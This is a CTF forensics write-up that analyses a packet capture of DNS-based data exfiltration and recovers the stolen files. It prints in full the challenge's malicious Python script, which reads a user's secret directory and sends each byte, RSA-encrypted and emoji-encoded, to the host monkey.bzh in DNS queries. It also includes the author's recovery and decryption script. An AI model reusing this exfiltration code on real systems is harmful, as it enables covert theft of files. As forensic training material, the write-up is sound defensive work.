Categories
CTF Writeups

[CTF] InterIUT – Forensics

The CTF had the usual categories, but today I am going to do the Write-up of the forensics series. It's composed of three challenges, on the same .pcapng file. The second one was solved by my mate SoEasY (he got some nice stuff on his website, in particular about reverse engineering, check it out). Regardless, I am going to explain all three of them.

Part 1

Le SOC de Random Corp a detecte une activite suspecte sur le reseau. Apparemment des donnees auraient ete exfiltres depuis le poste de Brian. Apres interrogation pas la DSI, Brian a avoue avoir execute volontairement un programme malicieux.
Retrouvez le nom du fichier malveillant qui a ete telecharge.

Format du flag : H2G2{nom_du_fichier.extension}

The Random Corp SOC has detected some suspicious activity on their network. Apparently, some data has been stolen from Brian's computer. After being interrogated by the DSI, Brian has admitted having voluntarily executed a malicious program.
Find out the name of the malware that was downloaded.
Flag format is : H2G2{nom_du_fichier.extension}

The first challenge is to find some malicious file that was downloaded. I am going to use wireshark throughout the 3 parts. So Wireshark has the functionality to check every file that was downloaded, and it also gives you the ability to recover it yourself.

Just go to file > Export Objects > HTTP. Right at the top, we get a file named the_game.py downloaded from monkey.bzh:8080. if you take a look at the other files, there is nothing suspicious about the file names or the domain names.

Now just hit save, and we can take a look at the content of the file.

#!/usr/bin/env python3
# coding: utf8

from scapy.all import *
from Crypto.PublicKey import RSA
from binascii import hexlify
import base64
from random import randint
from os import listdir
from os.path import isfile, join

C2 = "monkey.bzh"

KEY = RSA.generate(4096, e=3)

def start_exfiltration(f_name: str):
    m = base64.b64encode((f"Starting exfiltration of the file {f_name}").encode())
    sr1(IP(dst=C2)/UDP(sport=RandShort(),dport=53)/DNS(rd=1,qd=DNSQR(qname=format_query(m),qtype="A")),timeout=randint(1,10))


def end_exfiltration(f_name: str):
    m = base64.b64encode(f"The file {f_name} has been extracted".encode())
    sr1(IP(dst=C2)/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname=format_query(m))),verbose=0,timeout=randint(1,10))


def exfiltrate_data(message):
    m = base64.b64encode(message.encode())
    sr1(IP(dst=C2)/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname=format_query(m))),verbose=0,timeout=randint(1, 10))


def format_query(message: bytes) -> bytes:
    message = message.decode()
    n = 32
    data = [message[i:i+n] for i in range(0, len(message), n)]
    url = '.'.join(data) + '.' + C2
    return url.encode()


def lambdhack_like_rsa(f_name: str):
    with open(f_name, "rb") as f:
        data = f.read(1)
        while data:
            flag = int(hexlify(data),16)
            encoded = pow(flag, KEY.e, KEY.n)
            exfiltrate_data(i_m_a_monkey(encoded))
            data = f.read(1)


def i_m_a_monkey(i_wanna_be_a_monkey):
    my_super_monkey = ""
    for monkey in str(i_wanna_be_a_monkey):
        monkey = int(monkey)
        my_super_monkey += int(monkey/5)*"🙈" + int(monkey%5)*"🙉" + "🙊🙊"
    return my_super_monkey


if __name__=='__main__':
    PATH = "/home/Brian/.secret/"
    FILES = [f for f in listdir(PATH) if isfile(join(PATH, f))]
    for f in FILES:
        start_exfiltration(PATH + f)
        lambdhack_like_rsa(PATH + f)
        end_exfiltration(PATH + f)

We can see at the very beginning a function called start_exfiltration(). Chances are this is our file 🙂 . We will come back to this file and take a closer look at it in part 3 😉 .

The flag is H2G2{the_game.py}.

Part 2

Maintenant que vous avez retrouve le programme malveillant, le SOC vous demande de retrouver les noms des fichiers qui ont ete exfiltres.
Format du flag : H2G2{fichier_exfiltre1.extension,fichier_exfiltre2.extension,…}

Now that you've found the program, the SOC asks you to find out the names of the stolen files.
Flag format is : H2G2{fichier_exfiltre1.extension,fichier_exfiltre2.extension,…}

So now we need to find what files were extracted. Let's get back and take another look at the file.

In the main function, we easily get the directory the files were stolen from : "/home/Brian/.secret". But how to find the file names ?
Well, different messages are printed out throughout the process of exfiltrating the files like "Starting exfiltration of the file {f_name}" or "The file {f_name} has been extracted". Both times, the string is passed through the base64.b64encode() function, which encodes in... base64 (I know, shocking right ?). The start of a base64 encoded string, unlike any hash type, will not change if you add something to the end of the original string. So basically, we can search for a known start that precedes the files name :

Let's use the string command on the capture file, to display every printable string found in the file, and pipe into the grep command, to look for the desired string (take a few characters at the end off, because of the padding that can occur sometimes. And it's always best to look for short strings, to maximize your results chance).

We get the following results (there is twice the same output) :

VGhlIGZpbGUgL2hvbWUvQnJpYW4vLnNl Y3JldC9Db25maWRlbnRpYWwucGRmIGhh
VGhlIGZpbGUgL2hvbWUvQnJpYW4vLnNl Y3JldC9Db25maWRlbnRpYWwuanBnIGhh
VGhlIGZpbGUgL2hvbWUvQnJpYW4vLnNl Y3JldC9mbGFnLnR4dCBoYXMgYmVlbiBl

Now let decode it :

The flag is : H2G2{Confidential.pdf,Confidential.jpg,flag.txt}

Part 3

Le SOC vous indique que les fichiers ont ete supprimes et que aucune backup n'a ete faite. Retrouvez le contenu des fichiers.

The SOC points out to you that files were deleted and that no backup was made. Find the content of the files.

When looking for the string "monkey.bhz", you'll find some strange strings, and a lot of them. Let's apply a filter, to only keep the packets related to this particular port and IP address :

udp.srcport==53&&ip.addr==172.25.0.3

Now it is also way less laggy.

Before moving on, we have to understand what's going on in the lambdhack_like_rsa() function, to understand how the data we are looking for looks like. Here is the file one last time 😉 .

First, it opens the file. The f.read(1) instruction reads one byte from the file opened in the f file object. The byte is converted to hexadecimal which is then converted to its decimal value. The pow() instruction is then called with the decimal value and the e and n values of the RSA key generated at the beginning of the script, encrypting the byte. Finally, it calls the exfiltration function.

This is the interesting part. The decimal value is converted to monkey emojis with this line :

my_super_monkey += int(monkey/5)*"🙈" + int(monkey%5)*"🙉" + "🙊🙊"

It loops through every digit of the number and converts it to emojis. For example, the digit 7 equals to 🙈🙉🙉🙊🙊 because in python 7/5 = 1 and 7%5 = 2. With this process, you can create a value table with the emoji translation of every 9 digits.

Let's go back to Wireshark. We notice several packets with strange printable strings. These are UDP packets (the protocol used by the exfiltration script if you look at it again). When looking at the content, you'll see 3 different strings come back over and over. They are probably our monkeys. Let's check it out.

If you decode the base64 of one of the strings you'll get the following output :

Great ! The last step is to write a script that recovers the files based on our previous observations. First, let's export the data from Wireshark.

file > Export packet dissections > As JSON

This will generate a large JSON file, with several objects looking like this :

  {
    "_index": "packets-2020-11-24",
    "_type": "doc",
    "_score": null,
    "_source": {
      "layers": {

          [...],

          "Queries": {
            "8J+ZiPCfmYrwn5mK8J+ZivCfmYrwn5mI.8J+ZifCfmYrwn5mK8J+ZiPCfmYrwn5mK.8J+ZifCfmYnwn5mJ8J+ZivCfmYo=.monkey.bzh: type A, class IN": {
              "dns.qry.name": "8J+ZiPCfmYrwn5mK8J+ZivCfmYrwn5mI.8J+ZifCfmYrwn5mK8J+ZiPCfmYrwn5mK.8J+ZifCfmYnwn5mJ8J+ZivCfmYo=.monkey.bzh",
              "dns.qry.name.len": "105",
              "dns.count.labels": "5",
              "dns.qry.type": "1",
              "dns.qry.class": "0x00000001"
            }
          }
        }
      }
    }
  }

There are faster ways yo solve this (mine is slow because I am parsing the JSON file at the same time, but it works 🙂 ) but here is what I came up with :

import json, base64
from binascii import hexlify,  unhexlify
from Crypto.PublicKey import RSA

FILES=["Confidential.pdf","Confidential.jpg","flag.txt"]
ERRORS=["The file /home/Brian/.secret/Confidential.pdf has been extracted","The file /home/Brian/.secret/Confidential.jpg has been extracted"]
FILE="Confidential.pdf"
NEW_FILE = b''
table = ["", "🙉","🙉🙉", "🙉🙉🙉","🙉🙉🙉🙉",
        "🙈", "🙈🙉", "🙈🙉🙉", "🙈🙉🙉🙉", "🙈🙉🙉🙉🙉"]
KEY = RSA.generate(4096, e=3)

def changeFile():
    global FILE, FILES, NEW_FILE
    with open(FILE, "wb") as f:
        f.write(NEW_FILE)
    NEW_FILE = b''
    FILE = FILES[FILES.index(FILE)+1]


with open("files.json", 'rb') as f:
    content = json.load(f)

ind = 0
for i in content:
    json_object = i["_source"]["layers"]["dns"]["Queries"].items()
    for key, value in json_object:
        line = value["dns.qry.name"].replace('.monkey.bzh',"")
        unicode = base64.b64decode(line).decode('utf-8', "replace")

        if unicode in ERRORS:
            changeFile()
        else:
            char = unicode.split("🙊🙊")

            octet = ""
            for j in char:
                octet += str(table.index(j))

            octet = int(octet[:-1])
            decipher = hex(pow(octet, KEY.d, KEY.n))
            decipher = str(decipher).replace('0x',"").strip()
            if len(decipher) == 1:
                decipher = "0"+decipher
            h = unhexlify(decipher)

            ind += 1
            if ind%100 == 0:
                print(ind)
            NEW_FILE += h

Let's break some parts down.

First I open the JSON file and save the content in a variable after parsing it as JSON. This allows me to loop through the first level objects, and to get the base64 encoded string by using the JSON key/value system. Don't get confused by the for key, value in json_object: loop. I just had to split the string recovery into two parts, because the very string is used as a key at some point.

The emojis are then decoded and stored in the unicode variable. I use the strings stored in ERROS as separators between the 3 files, so if the content of unicode is one of the three strings, the file is written and we switch to the next file.

You'll notice the translation table at the start. I got rid of the "🙊🙊" present at the end of each digit, as they will be used as separators. Each translation is stored at the index representing the digit.

Once I've recovered the decimal representation, I have to bypass the RSA encryption. In our case, it's "fairly" easy. Indeed, the public exponent equals 3, so in most cases, a simple cube root would do the job. This article gives a good explanation of how the exploit works. Here it's not even necessary, the size of the RSA key parameters are so small, that any randomly generated key of similar size will decode it 🙂

The end of the script is just about converting the decrypted decimal back to its hexadecimal form, add some padding if necessary (a byte's hexadecimal representation should always be of size 2), and add it to the previously decoded bytes.

In the end, if you're patient enough, you should get a PDF (which is the longest file to recover) with the flag in it, a JPG image, and a text file (which are both fakes 😉 ).

H2G2{DN5_3xf1l7r4710n_15_funny!!!}

Conclusion

The challenges were overall really interesting, and fun to solve. I am just a bit disappointed because my solution for part 3 was really slow, and even if the script was running before the end, I got the flag a few minutes after the competition's ending 🙂 (from the 3rd place to the 7th lol).
Another thing I regret is the size of the captured file... It was over 2Go. It's true, it's more realistic that way, and forces you to smartly use filters, but every time you want to change your filters or display any information, everything slows down. And in my opinion, when a competition is over the weekend, it's nice to have some time to try out different kinds of challenges, and not be stuck in one category.

However, the CTF was really nice, and the admins really put some effort in. I am really excited to participate again next year ! 🙂

I hoped you enjoyed the write-up, it's a bit longer than usual (took me longer to write as well) but I believe these challenges were worth explaining, and are a good introduction to DNS exfiltration.